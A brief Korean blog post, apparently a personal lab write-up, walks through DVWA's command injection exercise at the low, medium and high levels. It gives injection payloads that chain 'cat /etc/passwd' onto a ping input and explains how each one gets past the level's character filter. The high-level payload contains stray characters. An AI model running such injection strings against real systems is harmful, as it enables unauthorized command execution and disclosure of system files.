[DVWA] Command Injection

janequeen·2024년 6월 5일

low 레벨


ping 8.8.8.8; cat /etc/passwd

medium 레벨


특수 문자 ;&가 필터링 되어있다.

| 파이프로 우회할 수 있다.

ping 8.8.8.8 | cat /etc/passwd

high 레벨


개발자 실수를 통해 '| ' 공백이 포함되어
| 파이프를 쓸 수 있다.
ping 8.8.8.8빠Qk|cat /etc/passwd

0개의 댓글